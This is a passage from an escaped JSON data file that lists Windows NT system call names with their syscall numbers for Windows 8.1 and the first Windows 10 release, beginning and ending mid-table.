\"NtSetIRTimer\": \"366\", \"NtSetInformationDebugObject\": \"367\", \"NtSetInformationEnlistment\": \"368\", \"NtSetInformationJobObject\": \"369\", \"NtSetInformationKey\": \"370\", \"NtSetInformationResourceManager\": \"371\", \"NtSetInformationToken\": \"372\", \"NtSetInformationTransaction\": \"373\", \"NtSetInformationTransactionManager\": \"374\", \"NtSetInformationVirtualMemory\": \"375\", \"NtSetInformationWorkerFactory\": \"376\", \"NtSetIntervalProfile\": \"377\", \"NtSetIoCompletion\": \"378\", \"NtSetIoCompletionEx\": \"379\", \"NtSetLdtEntries\": \"380\", \"NtSetLowEventPair\": \"381\", \"NtSetLowWaitHighEventPair\": \"382\", \"NtSetQuotaInformationFile\": \"383\", \"NtSetSecurityObject\": \"384\", \"NtSetSystemEnvironmentValue\": \"385\", \"NtSetSystemEnvironmentValueEx\": \"386\", \"NtSetSystemInformation\": \"387\", \"NtSetSystemPowerState\": \"388\", \"NtSetSystemTime\": \"389\", \"NtSetThreadExecutionState\": \"390\", \"NtSetTimerEx\": \"391\", \"NtSetTimerResolution\": \"392\", \"NtSetUuidSeed\": \"393\", \"NtSetVolumeInformationFile\": \"394\", \"NtShutdownSystem\": \"395\", \"NtShutdownWorkerFactory\": \"396\", \"NtSignalAndWaitForSingleObject\": \"397\", \"NtSinglePhaseReject\": \"398\", \"NtStartProfile\": \"399\", \"NtStopProfile\": \"400\", \"NtSubscribeWnfStateChange\": \"401\", \"NtSuspendProcess\": \"402\", \"NtSuspendThread\": \"403\", \"NtSystemDebugControl\": \"404\", \"NtTerminateJobObject\": \"405\", \"NtTestAlert\": \"406\", \"NtThawRegistry\": \"407\", \"NtThawTransactions\": \"408\", \"NtTraceControl\": \"409\", \"NtTranslateFilePath\": \"410\", \"NtUmsThreadYield\": \"411\", \"NtUnloadDriver\": \"412\", \"NtUnloadKey\": \"413\", \"NtUnloadKey2\": \"414\", \"NtUnloadKeyEx\": \"415\", \"NtUnlockFile\": \"416\", \"NtUnlockVirtualMemory\": \"417\", \"NtUnmapViewOfSectionEx\": \"418\", \"NtUnsubscribeWnfStateChange\": \"419\", \"NtUpdateWnfStateData\": \"420\", \"NtVdmControl\": \"421\", \"NtWaitForAlertByThreadId\": \"422\", \"NtWaitForDebugEvent\": \"423\", \"NtWaitForKeyedEvent\": \"424\", \"NtWaitForWnfNotifications\": \"425\", \"NtWaitForWorkViaWorkerFactory\": \"426\", \"NtWaitHighEventPair\": \"427\", \"NtWaitLowEventPair\": \"428\"}, \"8.1\": {\"NtWorkerFactoryWorkerReady\": \"0\", \"NtAcceptConnectPort\": \"1\", \"NtMapUserPhysicalPagesScatter\": \"2\", \"NtWaitForSingleObject\": \"3\", \"NtCallbackReturn\": \"4\", \"NtReadFile\": \"5\", \"NtDeviceIoControlFile\": \"6\", \"NtWriteFile\": \"7\", \"NtRemoveIoCompletion\": \"8\", \"NtReleaseSemaphore\": \"9\", \"NtReplyWaitReceivePort\": \"10\", \"NtReplyPort\": \"11\", \"NtSetInformationThread\": \"12\", \"NtSetEvent\": \"13\", \"NtClose\": \"14\", \"NtQueryObject\": \"15\", \"NtQueryInformationFile\": \"16\", \"NtOpenKey\": \"17\", \"NtEnumerateValueKey\": \"18\", \"NtFindAtom\": \"19\", \"NtQueryDefaultLocale\": \"20\", \"NtQueryKey\": \"21\", \"NtQueryValueKey\": \"22\", \"NtAllocateVirtualMemory\": \"23\", \"NtQueryInformationProcess\": \"24\", \"NtWaitForMultipleObjects32\": \"25\", \"NtWriteFileGather\": \"26\", \"NtSetInformationProcess\": \"27\", \"NtCreateKey\": \"28\", \"NtFreeVirtualMemory\": \"29\", \"NtImpersonateClientOfPort\": \"30\", \"NtReleaseMutant\": \"31\", \"NtQueryInformationToken\": \"32\", \"NtRequestWaitReplyPort\": \"33\", \"NtQueryVirtualMemory\": \"34\", \"NtOpenThreadToken\": \"35\", \"NtQueryInformationThread\": \"36\", \"NtOpenProcess\": \"37\", \"NtSetInformationFile\": \"38\", \"NtMapViewOfSection\": \"39\", \"NtAccessCheckAndAuditAlarm\": \"40\", \"NtUnmapViewOfSection\": \"41\", \"NtReplyWaitReceivePortEx\": \"42\", \"NtTerminateProcess\": \"43\", \"NtSetEventBoostPriority\": \"44\", \"NtReadFileScatter\": \"45\", \"NtOpenThreadTokenEx\": \"46\", \"NtOpenProcessTokenEx\": \"47\", \"NtQueryPerformanceCounter\": \"48\", \"NtEnumerateKey\": \"49\", \"NtOpenFile\": \"50\", \"NtDelayExecution\": \"51\", \"NtQueryDirectoryFile\": \"52\", \"NtQuerySystemInformation\": \"53\", \"NtOpenSection\": \"54\", \"NtQueryTimer\": \"55\", \"NtFsControlFile\": \"56\", \"NtWriteVirtualMemory\": \"57\", \"NtCloseObjectAuditAlarm\": \"58\", \"NtDuplicateObject\": \"59\", \"NtQueryAttributesFile\": \"60\", \"NtClearEvent\": \"61\", \"NtReadVirtualMemory\": \"62\", \"NtOpenEvent\": \"63\", \"NtAdjustPrivilegesToken\": \"64\", \"NtDuplicateToken\": \"65\", \"NtContinue\": \"66\", \"NtQueryDefaultUILanguage\": \"67\", \"NtQueueApcThread\": \"68\", \"NtYieldExecution\": \"69\", \"NtAddAtom\": \"70\", \"NtCreateEvent\": \"71\", \"NtQueryVolumeInformationFile\": \"72\", \"NtCreateSection\": \"73\", \"NtFlushBuffersFile\": \"74\", \"NtApphelpCacheControl\": \"75\", \"NtCreateProcessEx\": \"76\", \"NtCreateThread\": \"77\", \"NtIsProcessInJob\": \"78\", \"NtProtectVirtualMemory\": \"79\", \"NtQuerySection\": \"80\", \"NtResumeThread\": \"81\", \"NtTerminateThread\": \"82\", \"NtReadRequestData\": \"83\", \"NtCreateFile\": \"84\", \"NtQueryEvent\": \"85\", \"NtWriteRequestData\": \"86\", \"NtOpenDirectoryObject\": \"87\", \"NtAccessCheckByTypeAndAuditAlarm\": \"88\", \"NtQuerySystemTime\": \"89\", \"NtWaitForMultipleObjects\": \"90\", \"NtSetInformationObject\": \"91\", \"NtCancelIoFile\": \"92\", \"NtTraceEvent\": \"93\", \"NtPowerInformation\": \"94\", \"NtSetValueKey\": \"95\", \"NtCancelTimer\": \"96\", \"NtSetTimer\": \"97\", \"NtAccessCheck\": \"98\", \"NtAccessCheckByType\": \"99\", \"NtAccessCheckByTypeResultList\": \"100\", \"NtAccessCheckByTypeResultListAndAuditAlarm\": \"101\", \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": \"102\", \"NtAddAtomEx\": \"103\", \"NtAddBootEntry\": \"104\", \"NtAddDriverEntry\": \"105\", \"NtAdjustGroupsToken\": \"106\", \"NtAdjustTokenClaimsAndDeviceGroups\": \"107\", \"NtAlertResumeThread\": \"108\", \"NtAlertThread\": \"109\", \"NtAlertThreadByThreadId\": \"110\", \"NtAllocateLocallyUniqueId\": \"111\", \"NtAllocateReserveObject\": \"112\", \"NtAllocateUserPhysicalPages\": \"113\", \"NtAllocateUuids\": \"114\", \"NtAlpcAcceptConnectPort\": \"115\", \"NtAlpcCancelMessage\": \"116\", \"NtAlpcConnectPort\": \"117\", \"NtAlpcConnectPortEx\": \"118\", \"NtAlpcCreatePort\": \"119\", \"NtAlpcCreatePortSection\": \"120\", \"NtAlpcCreateResourceReserve\": \"121\", \"NtAlpcCreateSectionView\": \"122\", \"NtAlpcCreateSecurityContext\": \"123\", \"NtAlpcDeletePortSection\": \"124\", \"NtAlpcDeleteResourceReserve\": \"125\", \"NtAlpcDeleteSectionView\": \"126\", \"NtAlpcDeleteSecurityContext\": \"127\", \"NtAlpcDisconnectPort\": \"128\", \"NtAlpcImpersonateClientOfPort\": \"129\", \"NtAlpcOpenSenderProcess\": \"130\", \"NtAlpcOpenSenderThread\": \"131\", \"NtAlpcQueryInformation\": \"132\", \"NtAlpcQueryInformationMessage\": \"133\", \"NtAlpcRevokeSecurityContext\": \"134\", \"NtAlpcSendWaitReceivePort\": \"135\", \"NtAlpcSetInformation\": \"136\", \"NtAreMappedFilesTheSame\": \"137\", \"NtAssignProcessToJobObject\": \"138\", \"NtAssociateWaitCompletionPacket\": \"139\", \"NtCancelIoFileEx\": \"140\", \"NtCancelSynchronousIoFile\": \"141\", \"NtCancelTimer2\": \"142\", \"NtCancelWaitCompletionPacket\": \"143\", \"NtCommitComplete\": \"144\", \"NtCommitEnlistment\": \"145\", \"NtCommitTransaction\": \"146\", \"NtCompactKeys\": \"147\", \"NtCompareTokens\": \"148\", \"NtCompleteConnectPort\": \"149\", \"NtCompressKey\": \"150\", \"NtConnectPort\": \"151\", \"NtCreateDebugObject\": \"152\", \"NtCreateDirectoryObject\": \"153\", \"NtCreateDirectoryObjectEx\": \"154\", \"NtCreateEnlistment\": \"155\", \"NtCreateEventPair\": \"156\", \"NtCreateIRTimer\": \"157\", \"NtCreateIoCompletion\": \"158\", \"NtCreateJobObject\": \"159\", \"NtCreateJobSet\": \"160\", \"NtCreateKeyTransacted\": \"161\", \"NtCreateKeyedEvent\": \"162\", \"NtCreateLowBoxToken\": \"163\", \"NtCreateMailslotFile\": \"164\", \"NtCreateMutant\": \"165\", \"NtCreateNamedPipeFile\": \"166\", \"NtCreatePagingFile\": \"167\", \"NtCreatePort\": \"168\", \"NtCreatePrivateNamespace\": \"169\", \"NtCreateProcess\": \"170\", \"NtCreateProfile\": \"171\", \"NtCreateProfileEx\": \"172\", \"NtCreateResourceManager\": \"173\", \"NtCreateSemaphore\": \"174\", \"NtCreateSymbolicLinkObject\": \"175\", \"NtCreateThreadEx\": \"176\", \"NtCreateTimer\": \"177\", \"NtCreateTimer2\": \"178\", \"NtCreateToken\": \"179\", \"NtCreateTokenEx\": \"180\", \"NtCreateTransaction\": \"181\", \"NtCreateTransactionManager\": \"182\", \"NtCreateUserProcess\": \"183\", \"NtCreateWaitCompletionPacket\": \"184\", \"NtCreateWaitablePort\": \"185\", \"NtCreateWnfStateName\": \"186\", \"NtCreateWorkerFactory\": \"187\", \"NtDebugActiveProcess\": \"188\", \"NtDebugContinue\": \"189\", \"NtDeleteAtom\": \"190\", \"NtDeleteBootEntry\": \"191\", \"NtDeleteDriverEntry\": \"192\", \"NtDeleteFile\": \"193\", \"NtDeleteKey\": \"194\", \"NtDeleteObjectAuditAlarm\": \"195\", \"NtDeletePrivateNamespace\": \"196\", \"NtDeleteValueKey\": \"197\", \"NtDeleteWnfStateData\": \"198\", \"NtDeleteWnfStateName\": \"199\", \"NtDisableLastKnownGood\": \"200\", \"NtDisplayString\": \"201\", \"NtDrawText\": \"202\", \"NtEnableLastKnownGood\": \"203\", \"NtEnumerateBootEntries\": \"204\", \"NtEnumerateDriverEntries\": \"205\", \"NtEnumerateSystemEnvironmentValuesEx\": \"206\", \"NtEnumerateTransactionObject\": \"207\", \"NtExtendSection\": \"208\", \"NtFilterBootOption\": \"209\", \"NtFilterToken\": \"210\", \"NtFilterTokenEx\": \"211\", \"NtFlushBuffersFileEx\": \"212\", \"NtFlushInstallUILanguage\": \"213\", \"NtFlushInstructionCache\": \"214\", \"NtFlushKey\": \"215\", \"NtFlushProcessWriteBuffers\": \"216\", \"NtFlushVirtualMemory\": \"217\", \"NtFlushWriteBuffer\": \"218\", \"NtFreeUserPhysicalPages\": \"219\", \"NtFreezeRegistry\": \"220\", \"NtFreezeTransactions\": \"221\", \"NtGetCachedSigningLevel\": \"222\", \"NtGetCompleteWnfStateSubscription\": \"223\", \"NtGetContextThread\": \"224\", \"NtGetCurrentProcessorNumber\": \"225\", \"NtGetDevicePowerState\": \"226\", \"NtGetMUIRegistryInfo\": \"227\", \"NtGetNextProcess\": \"228\", \"NtGetNextThread\": \"229\", \"NtGetNlsSectionPtr\": \"230\", \"NtGetNotificationResourceManager\": \"231\", \"NtGetWriteWatch\": \"232\", \"NtImpersonateAnonymousToken\": \"233\", \"NtImpersonateThread\": \"234\", \"NtInitializeNlsFiles\": \"235\", \"NtInitializeRegistry\": \"236\", \"NtInitiatePowerAction\": \"237\", \"NtIsSystemResumeAutomatic\": \"238\", \"NtIsUILanguageComitted\": \"239\", \"NtListenPort\": \"240\", \"NtLoadDriver\": \"241\", \"NtLoadKey\": \"242\", \"NtLoadKey2\": \"243\", \"NtLoadKeyEx\": \"244\", \"NtLockFile\": \"245\", \"NtLockProductActivationKeys\": \"246\", \"NtLockRegistryKey\": \"247\", \"NtLockVirtualMemory\": \"248\", \"NtMakePermanentObject\": \"249\", \"NtMakeTemporaryObject\": \"250\", \"NtMapCMFModule\": \"251\", \"NtMapUserPhysicalPages\": \"252\", \"NtModifyBootEntry\": \"253\", \"NtModifyDriverEntry\": \"254\", \"NtNotifyChangeDirectoryFile\": \"255\", \"NtNotifyChangeKey\": \"256\", \"NtNotifyChangeMultipleKeys\": \"257\", \"NtNotifyChangeSession\": \"258\", \"NtOpenEnlistment\": \"259\", \"NtOpenEventPair\": \"260\", \"NtOpenIoCompletion\": \"261\", \"NtOpenJobObject\": \"262\", \"NtOpenKeyEx\": \"263\", \"NtOpenKeyTransacted\": \"264\", \"NtOpenKeyTransactedEx\": \"265\", \"NtOpenKeyedEvent\": \"266\", \"NtOpenMutant\": \"267\", \"NtOpenObjectAuditAlarm\": \"268\", \"NtOpenPrivateNamespace\": \"269\", \"NtOpenProcessToken\": \"270\", \"NtOpenResourceManager\": \"271\", \"NtOpenSemaphore\": \"272\", \"NtOpenSession\": \"273\", \"NtOpenSymbolicLinkObject\": \"274\", \"NtOpenThread\": \"275\", \"NtOpenTimer\": \"276\", \"NtOpenTransaction\": \"277\", \"NtOpenTransactionManager\": \"278\", \"NtPlugPlayControl\": \"279\", \"NtPrePrepareComplete\": \"280\", \"NtPrePrepareEnlistment\": \"281\", \"NtPrepareComplete\": \"282\", \"NtPrepareEnlistment\": \"283\", \"NtPrivilegeCheck\": \"284\", \"NtPrivilegeObjectAuditAlarm\": \"285\", \"NtPrivilegedServiceAuditAlarm\": \"286\", \"NtPropagationComplete\": \"287\", \"NtPropagationFailed\": \"288\", \"NtPulseEvent\": \"289\", \"NtQueryBootEntryOrder\": \"290\", \"NtQueryBootOptions\": \"291\", \"NtQueryDebugFilterState\": \"292\", \"NtQueryDirectoryObject\": \"293\", \"NtQueryDriverEntryOrder\": \"294\", \"NtQueryEaFile\": \"295\", \"NtQueryFullAttributesFile\": \"296\", \"NtQueryInformationAtom\": \"297\", \"NtQueryInformationEnlistment\": \"298\", \"NtQueryInformationJobObject\": \"299\", \"NtQueryInformationPort\": \"300\", \"NtQueryInformationResourceManager\": \"301\", \"NtQueryInformationTransaction\": \"302\", \"NtQueryInformationTransactionManager\": \"303\", \"NtQueryInformationWorkerFactory\": \"304\", \"NtQueryInstallUILanguage\": \"305\", \"NtQueryIntervalProfile\": \"306\", \"NtQueryIoCompletion\": \"307\", \"NtQueryLicenseValue\": \"308\", \"NtQueryMultipleValueKey\": \"309\", \"NtQueryMutant\": \"310\", \"NtQueryOpenSubKeys\": \"311\", \"NtQueryOpenSubKeysEx\": \"312\", \"NtQueryPortInformationProcess\": \"313\", \"NtQueryQuotaInformationFile\": \"314\", \"NtQuerySecurityAttributesToken\": \"315\", \"NtQuerySecurityObject\": \"316\", \"NtQuerySemaphore\": \"317\", \"NtQuerySymbolicLinkObject\": \"318\", \"NtQuerySystemEnvironmentValue\": \"319\", \"NtQuerySystemEnvironmentValueEx\": \"320\", \"NtQuerySystemInformationEx\": \"321\", \"NtQueryTimerResolution\": \"322\", \"NtQueryWnfStateData\": \"323\", \"NtQueryWnfStateNameInformation\": \"324\", \"NtQueueApcThreadEx\": \"325\", \"NtRaiseException\": \"326\", \"NtRaiseHardError\": \"327\", \"NtReadOnlyEnlistment\": \"328\", \"NtRecoverEnlistment\": \"329\", \"NtRecoverResourceManager\": \"330\", \"NtRecoverTransactionManager\": \"331\", \"NtRegisterProtocolAddressInformation\": \"332\", \"NtRegisterThreadTerminatePort\": \"333\", \"NtReleaseKeyedEvent\": \"334\", \"NtReleaseWorkerFactoryWorker\": \"335\", \"NtRemoveIoCompletionEx\": \"336\", \"NtRemoveProcessDebug\": \"337\", \"NtRenameKey\": \"338\", \"NtRenameTransactionManager\": \"339\", \"NtReplaceKey\": \"340\", \"NtReplacePartitionUnit\": \"341\", \"NtReplyWaitReplyPort\": \"342\", \"NtRequestPort\": \"343\", \"NtResetEvent\": \"344\", \"NtResetWriteWatch\": \"345\", \"NtRestoreKey\": \"346\", \"NtResumeProcess\": \"347\", \"NtRollbackComplete\": \"348\", \"NtRollbackEnlistment\": \"349\", \"NtRollbackTransaction\": \"350\", \"NtRollforwardTransactionManager\": \"351\", \"NtSaveKey\": \"352\", \"NtSaveKeyEx\": \"353\", \"NtSaveMergedKeys\": \"354\", \"NtSecureConnectPort\": \"355\", \"NtSerializeBoot\": \"356\", \"NtSetBootEntryOrder\": \"357\", \"NtSetBootOptions\": \"358\", \"NtSetCachedSigningLevel\": \"359\", \"NtSetContextThread\": \"360\", \"NtSetDebugFilterState\": \"361\", \"NtSetDefaultHardErrorPort\": \"362\", \"NtSetDefaultLocale\": \"363\", \"NtSetDefaultUILanguage\": \"364\", \"NtSetDriverEntryOrder\": \"365\", \"NtSetEaFile\": \"366\", \"NtSetHighEventPair\": \"367\", \"NtSetHighWaitLowEventPair\": \"368\", \"NtSetIRTimer\": \"369\", \"NtSetInformationDebugObject\": \"370\", \"NtSetInformationEnlistment\": \"371\", \"NtSetInformationJobObject\": \"372\", \"NtSetInformationKey\": \"373\", \"NtSetInformationResourceManager\": \"374\", \"NtSetInformationToken\": \"375\", \"NtSetInformationTransaction\": \"376\", \"NtSetInformationTransactionManager\": \"377\", \"NtSetInformationVirtualMemory\": \"378\", \"NtSetInformationWorkerFactory\": \"379\", \"NtSetIntervalProfile\": \"380\", \"NtSetIoCompletion\": \"381\", \"NtSetIoCompletionEx\": \"382\", \"NtSetLdtEntries\": \"383\", \"NtSetLowEventPair\": \"384\", \"NtSetLowWaitHighEventPair\": \"385\", \"NtSetQuotaInformationFile\": \"386\", \"NtSetSecurityObject\": \"387\", \"NtSetSystemEnvironmentValue\": \"388\", \"NtSetSystemEnvironmentValueEx\": \"389\", \"NtSetSystemInformation\": \"390\", \"NtSetSystemPowerState\": \"391\", \"NtSetSystemTime\": \"392\", \"NtSetThreadExecutionState\": \"393\", \"NtSetTimer2\": \"394\", \"NtSetTimerEx\": \"395\", \"NtSetTimerResolution\": \"396\", \"NtSetUuidSeed\": \"397\", \"NtSetVolumeInformationFile\": \"398\", \"NtSetWnfProcessNotificationEvent\": \"399\", \"NtShutdownSystem\": \"400\", \"NtShutdownWorkerFactory\": \"401\", \"NtSignalAndWaitForSingleObject\": \"402\", \"NtSinglePhaseReject\": \"403\", \"NtStartProfile\": \"404\", \"NtStopProfile\": \"405\", \"NtSubscribeWnfStateChange\": \"406\", \"NtSuspendProcess\": \"407\", \"NtSuspendThread\": \"408\", \"NtSystemDebugControl\": \"409\", \"NtTerminateJobObject\": \"410\", \"NtTestAlert\": \"411\", \"NtThawRegistry\": \"412\", \"NtThawTransactions\": \"413\", \"NtTraceControl\": \"414\", \"NtTranslateFilePath\": \"415\", \"NtUmsThreadYield\": \"416\", \"NtUnloadDriver\": \"417\", \"NtUnloadKey\": \"418\", \"NtUnloadKey2\": \"419\", \"NtUnloadKeyEx\": \"420\", \"NtUnlockFile\": \"421\", \"NtUnlockVirtualMemory\": \"422\", \"NtUnmapViewOfSectionEx\": \"423\", \"NtUnsubscribeWnfStateChange\": \"424\", \"NtUpdateWnfStateData\": \"425\", \"NtVdmControl\": \"426\", \"NtWaitForAlertByThreadId\": \"427\", \"NtWaitForDebugEvent\": \"428\", \"NtWaitForKeyedEvent\": \"429\", \"NtWaitForWorkViaWorkerFactory\": \"430\", \"NtWaitHighEventPair\": \"431\", \"NtWaitLowEventPair\": \"432\"}}, \"Windows 10\": {\"1507\": {\"NtAccessCheck\": \"0\", \"NtWorkerFactoryWorkerReady\": \"1\", \"NtAcceptConnectPort\": \"2\", \"NtMapUserPhysicalPagesScatter\": \"3\", \"NtWaitForSingleObject\": \"4\", \"NtCallbackReturn\": \"5\", \"NtReadFile\": \"6\", \"NtDeviceIoControlFile\": \"7\", \"NtWriteFile\": \"8\", \"NtRemoveIoCompletion\": \"9\", \"NtReleaseSemaphore\": \"10\", \"NtReplyWaitReceivePort\": \"11\", \"NtReplyPort\": \"12\", \"NtSetInformationThread\": \"13\", \"NtSetEvent\": \"14\", \"NtClose\": \"15\", \"NtQueryObject\": \"16\", \"NtQueryInformationFile\": \"17\", \"NtOpenKey\": \"18\", \"NtEnumerateValueKey\": \"19\", \"NtFindAtom\": \"20\", \"NtQueryDefaultLocale\": \"21\", \"NtQueryKey\": \"22\", \"NtQueryValueKey\": \"23\", \"NtAllocateVirtualMemory\": \"24\", \"NtQueryInformationProcess\": \"25\", \"NtWaitForMultipleObjects32\": \"26\", \"NtWriteFileGather\": \"27\", \"NtSetInformationProcess\": \"28\", \"NtCreateKey\": \"29\", \"NtFreeVirtualMemory\": \"30\", \"NtImpersonateClientOfPort\": \"31\", \"NtReleaseMutant\": \"32\", \"NtQueryInformationToken\": \"33\", \"NtRequestWaitReplyPort\": \"34\", \"NtQueryVirtualMemory\": \"35\", \"NtOpenThreadToken\": \"36\", \"NtQueryInformationThread\": \"37\", \"NtOpenProcess\": \"38\", \"NtSetInformationFile\": \"39\", \"NtMapViewOfSection\": \"40\", \"NtAccessCheckAndAuditAlarm\": \"41\", \"NtUnmapViewOfSection\": \"42\", \"NtReplyWaitReceivePortEx\": \"43\", \"NtTerminateProcess\": \"44\", \"NtSetEventBoostPriority\": \"45\", \"NtReadFileScatter\": \"46\", \"NtOpenThreadTokenEx\": \"47\", \"NtOpenProcessTokenEx\": \"48\", \"NtQueryPerformanceCounter\": \"49\", \"NtEnumerateKey\": \"50\", \"NtOpenFile\": \"51\", \"NtDelayExecution\": \"52\", \"NtQueryDirectoryFile\": \"53\", \"NtQuerySystemInformation\": \"54\", \"NtOpenSection\": \"55\", \"NtQueryTimer\": \"56\", \"NtFsControlFile\": \"57\", \"NtWriteVirtualMemory\": \"58\", \"NtCloseObjectAuditAlarm\": \"59\", \"NtDuplicateObject\": \"60\", \"NtQueryAttributesFile\": \"61\", \"NtClearEvent\": \"62\", \"NtReadVirtualMemory\": \"63\", \"NtOpenEvent\": \"64\", \"NtAdjustPrivilegesToken\": \"65\", \"NtDuplicateToken\": \"66\", \"NtContinue\": \"67\", \"NtQueryDefaultUILanguage\": \"68\", \"NtQueueApcThread\": \"69\", \"NtYieldExecution\": \"70\", \"NtAddAtom\": \"71\", \"NtCreateEvent\": \"72\", \"NtQueryVolumeInformationFile\": \"73\", \"NtCreateSection\": \"74\", \"NtFlushBuffersFile\": \"75\", \"NtApphelpCacheControl\": \"76\", \"NtCreateProcessEx\": \"77\", \"NtCreateThread\": \"78\", \"NtIsProcessInJob\": \"79\", \"NtProtectVirtualMemory\": \"80\", \"NtQuerySection\": \"81\", \"NtResumeThread\": \"82\", \"NtTerminateThread\": \"83\", \"NtReadRequestData\": \"84\", \"NtCreateFile\": \"85\", \"NtQueryEvent\": \"86\", \"NtWriteRequestData\": \"87\", \"NtOpenDirectoryObject\": \"88\", \"NtAccessCheckByTypeAndAuditAlarm\": \"89\", \"NtQuerySystemTime\": \"90\", \"NtWaitForMultipleObjects\": \"91\", \"NtSetInformationObject\": \"92\", \"NtCancelIoFile\": \"93\", \"NtTraceEvent\": \"94\", \"NtPowerInformation\": \"95\", \"NtSetValueKey\": \"96\", \"NtCancelTimer\": \"97\", \"NtSetTimer\": \"98\", \"NtAccessCheckByType\": \"99\", \"NtAccessCheckByTypeResultList\": \"100\", \"NtAccessCheckByTypeResultListAndAuditAlarm\": \"101\", \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": \"102\", \"NtAddAtomEx\": \"103\", \"NtAddBootEntry\": \"104\", \"NtAddDriverEntry\": \"105\", \"NtAdjustGroupsToken\": \"106\", \"NtAdjustTokenClaimsAndDeviceGroups\": \"107\", \"NtAlertResumeThread\": \"108\", \"NtAlertThread\": \"109\", \"NtAlertThreadByThreadId\": \"110\", \"NtAllocateLocallyUniqueId\": \"111\", \"NtAllocateReserveObject\": \"112\", \"NtAllocateUserPhysicalPages\": \"113\", \"NtAllocateUuids\": \"114\", \"NtAlpcAcceptConnectPort\": \"115\", \"NtAlpcCancelMessage\": \"116\", \"NtAlpcConnectPort\": \"117\", \"NtAlpcConnectPortEx\": \"118\", \"NtAlpcCreatePort\": \"119\", \"NtAlpcCreatePortSection\": \"120\", \"NtAlpcCreateResourceReserve\": \"121\", \"NtAlpcCreateSectionView\": \"122\", \"NtAlpcCreateSecurityContext\": \"123\", \"NtAlpcDeletePortSection\": \"124\", \"NtAlpcDeleteResourceReserve\": \"125\", \"NtAlpcDeleteSectionView\": \"126\", \"NtAlpcDeleteSecurityContext\": \"127\", \"NtAlpcDisconnectPort\": \"128\", \"NtAlpcImpersonateClientContainerOfPort\": \"129\", \"NtAlpcImpersonateClientOfPort\": \"130\", \"NtAlpcOpenSenderProcess\": \"131\", \"NtAlpcOpenSenderThread\": \"132\", \"NtAlpcQueryInformation\": \"133\", \"NtAlpcQueryInformationMessage\": \"134\", \"NtAlpcRevokeSecurityContext\": \"135\", \"NtAlpcSendWaitReceivePort\": \"136\", \"NtAlpcSetInformation\": \"137\", \"NtAreMappedFilesTheSame\": \"138\", \"NtAssignProcessToJobObject\": \"139\", \"NtAssociateWaitCompletionPacket\": \"140\", \"NtCancelIoFileEx\": \"141\", \"NtCancelSynchronousIoFile\": \"142\", \"NtCancelTimer2\": \"143\", \"NtCancelWaitCompletionPacket\": \"144\", \"NtCommitComplete\": \"145\", \"NtCommitEnlistment\": \"146\", \"NtCommitTransaction\": \"147\", \"NtCompactKeys\": \"148\", \"NtCompareObjects\": \"149\", \"NtCompareTokens\": \"150\", \"NtCompleteConnectPort\": \"151\", \"NtCompressKey\": \"152\", \"NtConnectPort\": \"153\", \"NtCreateDebugObject\": \"154\", \"NtCreateDirectoryObject\": \"155\", \"NtCreateDirectoryObjectEx\": \"156\", \"NtCreateEnlistment\": \"157\", \"NtCreateEventPair\": \"158\", \"NtCreateIRTimer\": \"159\", \"NtCreateIoCompletion\": \"160\", \"NtCreateJobObject\": \"161\", \"NtCreateJobSet\": \"162\", \"NtCreateKeyTransacted\": \"163\", \"NtCreateKeyedEvent\": \"164\", \"NtCreateLowBoxToken\": \"165\", \"NtCreateMailslotFile\": \"166\", \"NtCreateMutant\": \"167\", \"NtCreateNamedPipeFile\": \"168\", \"NtCreatePagingFile\": \"169\", \"NtCreatePartition\": \"170\", \"NtCreatePort\": \"171\", \"NtCreatePrivateNamespace\": \"172\", \"NtCreateProcess\": \"173\", \"NtCreateProfile\": \"174\", \"NtCreateProfileEx\": \"175\", \"NtCreateResourceManager\": \"176\", \"NtCreateSemaphore\": \"177\", \"NtCreateSymbolicLinkObject\": \"178\", \"NtCreateThreadEx\": \"179\", \"NtCreateTimer\": \"180\", \"NtCreateTimer2\": \"181\", \"NtCreateToken\": \"182\", \"NtCreateTokenEx\": \"183\", \"NtCreateTransaction\": \"184\", \"NtCreateTransactionManager\": \"185\", \"NtCreateUserProcess\": \"186\", \"NtCreateWaitCompletionPacket\": \"187\", \"NtCreateWaitablePort\": \"188\", \"NtCreateWnfStateName\": \"189\", \"NtCreateWorkerFactory\": \"190\", \"NtDebugActiveProcess\": \"191\", \"NtDebugContinue\": \"192\", \"NtDeleteAtom\": \"193\", \"NtDeleteBootEntry\": \"194\", \"NtDeleteDriverEntry\": \"195\", \"NtDeleteFile\": \"196\", \"NtDeleteKey\": \"197\", \"NtDeleteObjectAuditAlarm\": \"198\", \"NtDeletePrivateNamespace\": \"199\", \"NtDeleteValueKey\": \"200\", \"NtDeleteWnfStateData\": \"201\", \"NtDeleteWnfStateName\": \"202\", \"NtDisableLastKnownGood\": \"203\", \"NtDisplayString\": \"204\", \"NtDrawText\": \"205\", \"NtEnableLastKnownGood\": \"206\", \"NtEnumerateBootEntries\": \"207\", \"NtEnumerateDriverEntries\": \"208\", \"NtEnumerateSystemEnvironmentValuesEx\": \"209\", \"NtEnumerateTransactionObject\": \"210\", \"NtExtendSection\": \"211\", \"NtFilterBootOption\": \"212\", \"NtFilterToken\": \"213\", \"NtFilterTokenEx\": \"214\", \"NtFlushBuffersFileEx\": \"215\", \"NtFlushInstallUILanguage\": \"216\", \"NtFlushInstructionCache\": \"217\", \"NtFlushKey\": \"218\", \"NtFlushProcessWriteBuffers\": \"219\", \"NtFlushVirtualMemory\": \"220\", \"NtFlushWriteBuffer\": \"221\", \"NtFreeUserPhysicalPages\": \"222\", \"NtFreezeRegistry\": \"223\", \"NtFreezeTransactions\": \"224\", \"NtGetCachedSigningLevel\": \"225\", \"NtGetCompleteWnfStateSubscription\": \"226\", \"NtGetContextThread\": \"227\", \"NtGetCurrentProcessorNumber\": \"228\", \"NtGetCurrentProcessorNumberEx\": \"229\", \"NtGetDevicePowerState\": \"230\", \"NtGetMUIRegistryInfo\": \"231\", \"NtGetNextProcess\": \"232\", \"NtGetNextThread\": \"233\", \"NtGetNlsSectionPtr\": \"234\", \"NtGetNotificationResourceManager\": \"235\", \"NtGetWriteWatch\": \"236\", \"NtImpersonateAnonymousToken\": \"237\", \"NtImpersonateThread\": \"238\", \"NtInitializeNlsFiles\": \"239\", \"NtInitializeRegistry\": \"240\", \"NtInitiatePowerAction\": \"241\", \"NtIsSystemResumeAutomatic\": \"242\", \"NtIsUILanguageComitted\": \"243\", \"NtListenPort\": \"244\", \"NtLoadDriver\": \"245\", \"NtLoadKey\": \"246\", \"NtLoadKey2\": \"247\", \"NtLoadKeyEx\": \"248\", \"NtLockFile\": \"249\", 